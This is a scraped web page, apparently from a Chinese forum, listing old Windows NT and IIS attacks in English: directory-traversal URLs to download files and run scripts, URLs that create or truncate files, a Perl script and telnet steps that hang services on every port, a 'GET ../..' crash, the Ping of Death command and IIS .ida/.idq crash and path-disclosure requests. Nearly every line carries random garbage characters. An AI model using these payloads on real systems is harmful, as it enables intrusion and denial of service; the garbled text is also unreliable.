受影響系統(tǒng):4.0,iis 1.0/ E0 {! g% v& q
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.7 |( W% {6 j. L9 @
& f8 y, W0 ~: R* s8 ^, W8 c6 ^A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
$ B7 Q; B6 C# P- O! n2 g. O, r3 n+ [/ Z9 Z8 U
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
1 L. m7 ]" Y8 p! E& h
5 L! u V" d- C$ P--------------------------------------------------------------------
* C0 O+ V, m( a% B+ t& U/ e+ e { _1 B6 [& V: A
受影響系統(tǒng):4.0
+ h# |: L6 M9 z! q. `A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
, L; p6 ^7 Q. P( J
4 i* }. n# C$ `( S9 xIf the file 'target.bat' exists, the file will be truncated.5 E# f4 L* j* t" }/ U# ~
+ E$ }1 M4 y2 c7 z! b; }
7 K3 Y& U# a. @/ Q; I1 t3 z3 W0 J
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.- \# T/ N+ d8 [' {
! Q5 j5 G b/ B$ p& S. H4 K----------------------------------------------------------------------. Y% }+ B( n) t# k3 E
0 Q; i$ l$ I9 ~
受影響系統(tǒng):3.51,4.0
5 ~# T* y) y! g. fMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
( `. a$ U- O% _! E0 x) R+ ^" `) Q! T K3 a
The following steps;
; A; O9 S/ G/ k. q" `7 d1 @9 D$ O5 m2 b
Telnet to an NT 4.0 system on port 135 / \# {4 B- }9 b. H* i7 N! l( u3 `
Type about 10 characters followed by a <CR> 7 O, `2 W+ q+ Y9 J5 N# A
Exit Telnet ! V4 F- c+ b) ]' t4 a! g7 B
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
$ c2 Y) A+ F; o6 K0 c" w- ^9 m$ K) j7 A/ L. o( I, ?0 Y
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.* [5 C7 u7 A3 `( c/ J# B
1 S$ n6 [, d* E" t: B2 \# a' CThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted." T: f5 h" R ~0 K& }
" |+ p' p2 P- F) O- P7 z9 A2 h" B) z; l
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.5 o9 y+ O) f- Z3 [( k+ K
7 M2 {; X! `7 q" s
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
# I) _# ?2 m5 H( N' v9 i" M9 @2 S8 D) H8 F/ d! X; w+ @7 a
/*begin poke code*/
4 @6 o' k$ |# |( q1 [
, ?+ ?9 M( e' Suse Socket;8 h6 i4 d' M$ ^; H0 D+ n& P
use FileHandle;
4 S- b$ \# J- D+ [0 Srequire "chat2.pl";
0 U. Y! I1 e6 i P
g, Y1 }7 Q4 W- F* x# v+ P4 |$systemname = $ARGV[0] && shift;
( i+ `6 q, h7 _0 j9 `# X( f: X- j7 W J; S
$verbose = 1; # tell me what you're hitting8 z# o% q% h/ W* k5 {. c% u
$knownports = 1; # don't hit known problem ports
" H7 Y2 s6 z" e+ Kfor ($port = $0; $port<65535; $port++) + c' g2 {& Y: _1 S# U( W& Z0 b
{+ |' a( ]) a( b. I
# m8 S- e; {, m4 `: k7 ?& W! M
& K5 p( v9 |, {# n% y
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
- F H4 [0 n4 C9 V" Wnext;
) A- {$ f! e. z0 L) }3 |}
$ G" b" P- d0 w$fh = chat::open_port($systemname, $port);) m0 v! }; l. F
chat::print ($fh,"This is about ten characters or more");1 u9 H) S4 e9 X+ B7 p
if ($verbose) {
3 h; {' \0 c5 l" j. ~" aprint "Trying port: $port\n";5 n$ y/ E2 X7 K0 S) G
}
, X2 w8 F$ l+ {& dchat::close($fh);; b9 C& z. i5 v' x/ q* L1 @
% ^% @5 h1 h& c$ k% R
}
' ~# d5 Z$ @7 W# X# w$ ^% e, U* ]2 D1 ]+ m8 A0 K
, l z+ N6 G. P% Q/ A5 E+ b- h
/*end poke code*/: n1 L) n( \% ?' R+ X7 Y
. d0 a) s L* Y1 Y
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername. g! d. s% ` ]2 {( c1 D/ ]
! i3 }4 S; i- E
--------------------------------------------------------------------------------
% E" T( V" A ^# ]1 Z* j! y' z( G H! f7 p# J
受影響系統(tǒng):4.0+ j+ ?7 [- H. i& z1 D1 h' _0 J
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.0 J. b5 Y- x. D! \! `" }- `1 f
/ `' E. A/ A Q& I* aThis attack causes Dr. Watson to display an alert window and to log an error:
/ `; X R( [, { u/ n0 B/ H! R7 t; p- A
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
1 D1 C$ z/ l8 f9 z% G, L8 ?$ |
! s; P3 C' J( {" p q$ b1 x3 l$ p6 ~--------------------------------------------------------------------------------
" c) A; L, a _, }1 o5 }+ F/ }+ f0 c l. s+ C2 n3 G+ O
受影響系統(tǒng):3.51,4.0
- a! d% L: j+ K( Y! b8 mLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:) z+ R2 K9 W; Z+ n/ m' ^
6 a8 ~' ^ @3 s$ N
STOP: 0X0000001E
# J6 a2 y/ @6 Z9 tKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS8 x# K: t0 o; R) r' o8 z+ \2 q
; }" t4 [# q3 ?-OR-" ^' S, u& e, r v( q
1 K2 d# d% C/ k4 B M
STOP: 0x0000000A
/ J7 N. r0 v, ]: G" k) Y OIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS/ |# w6 e: m4 ?# b4 [' E
( V8 w0 k6 m7 h1 g: P! t# n+ E
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
% s6 n' r: `( b* \1 n" i
4 P2 {" t, v2 O4 s0 m* W--------------------------------------------------------------------------------1 G7 J: Z! V" B0 Z$ u7 z
' i( u$ z- v# ^9 b% h3 M7 ?Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
! u: X( J% E7 U1 r' h/ f* {4 ^7 R& g# l# `0 K* R; e
-------------------------------------------------------- k/ D. V/ _. k) ~9 c
9 s$ I4 ]" j& v/ k; C5 ?9 v
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |